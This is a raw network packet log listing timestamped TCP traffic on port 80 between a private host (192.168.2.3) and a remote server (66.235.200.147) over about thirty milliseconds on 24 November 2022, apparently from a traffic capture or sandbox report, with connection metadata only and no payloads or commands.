Nov 24, 2022 12:19:59.723673105 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723689079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723716974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723727942 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723745108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723773003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723782063 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723800898 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723828077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723843098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723855972 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723884106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723911047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723922968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723938942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723952055 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723968983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723995924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724035025 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724241972 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724272013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724299908 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724320889 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724327087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724338055 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724356890 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724385023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724411964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724423885 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724438906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724450111 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724467993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724494934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724505901 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724523067 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724551916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724581957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724594116 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724610090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724622965 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724637032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724663973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724690914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724703074 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724718094 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724734068 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724746943 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724773884 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724802017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724816084 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724828959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.724843025 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.724858046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725255966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725274086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725287914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725317001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725346088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725372076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725387096 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725402117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725408077 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725433111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725462914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725485086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725491047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725508928 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725521088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725549936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725568056 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725579023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725610018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725626945 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725637913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725667000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725683928 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725693941 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725720882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725747108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725765944 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725775957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725795031 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725804090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725831032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725857019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725874901 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725883961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.725900888 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.725914001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726197004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726227045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726254940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726257086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726284027 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726311922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726322889 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726339102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726342916 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726368904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726397038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726419926 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726424932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726448059 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726457119 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726485968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726512909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726535082 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726541996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726557970 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726571083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726603031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726630926 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726655960 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726658106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726676941 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726689100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726716995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726743937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726761103 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726771116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726787090 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726799011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726826906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726852894 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.726870060 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.726906061 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727066994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727096081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727144957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727154016 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727174044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727201939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727222919 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727231979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727267027 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727272034 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727297068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727323055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727350950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727368116 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727380037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727396965 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727407932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727436066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727462053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727488041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727488995 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727515936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727520943 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727544069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727571011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727572918 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727600098 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727627039 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727643013 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727653980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727674961 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727680922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727709055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727735996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.727751970 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.727782965 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728040934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728069067 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728097916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728126049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728137016 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728153944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728183031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728188038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728213072 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728229046 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728243113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728271961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728298903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728319883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728339911 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728425026 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728452921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728463888 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728482008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728493929 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728508949 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728513956 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728535891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728558064 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728564978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728595018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728612900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728621960 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728650093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728671074 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728677988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728704929 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728730917 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.728751898 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.728780031 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729079962 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729110956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729140997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729166031 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729170084 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729199886 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729222059 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729229927 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729259968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729286909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729305029 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729315996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729337931 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729345083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729372025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729398966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729418993 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729425907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729445934 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729454994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729481936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729504108 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729510069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729537964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729564905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729579926 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729593039 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729603052 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729619980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729646921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729672909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729685068 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729701042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.729712009 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.729727983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.730000973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.730021000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.730051041 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.730081081 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743012905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743046045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743067026 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743086100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743113041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743139029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743153095 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743163109 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743185043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743196964 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743206978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743227005 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743227959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743248940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743268013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743288040 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743297100 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743304014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743324995 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743325949 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743345022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743355036 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743366957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743386984 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743403912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743407965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743428946 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743434906 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743448973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743469954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743489027 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743496895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743510008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743525982 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743530035 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743549109 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743549109 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743568897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743587971 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743590117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743611097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743628979 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743629932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743650913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743669033 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743686914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743688107 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743705988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743716002 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743726015 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743745089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743746996 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743765116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743784904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743797064 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743803978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743824005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.743833065 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.743869066 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744138002 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744159937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744179964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744199991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744216919 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744219065 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744240999 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744250059 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744263887 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744283915 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744292021 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744303942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744323015 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744338036 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744342089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744363070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744366884 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744383097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744404078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744415045 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744424105 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744443893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744448900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744465113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744482040 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744503021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744505882 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744523048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744533062 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744543076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744561911 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744573116 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744581938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744599104 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.744604111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.744642973 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.745186090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.745212078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.745229959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.745284081 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.752549887 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752585888 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752607107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752626896 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752646923 CET	80	49708	66.235.200.147	192.168.2.3
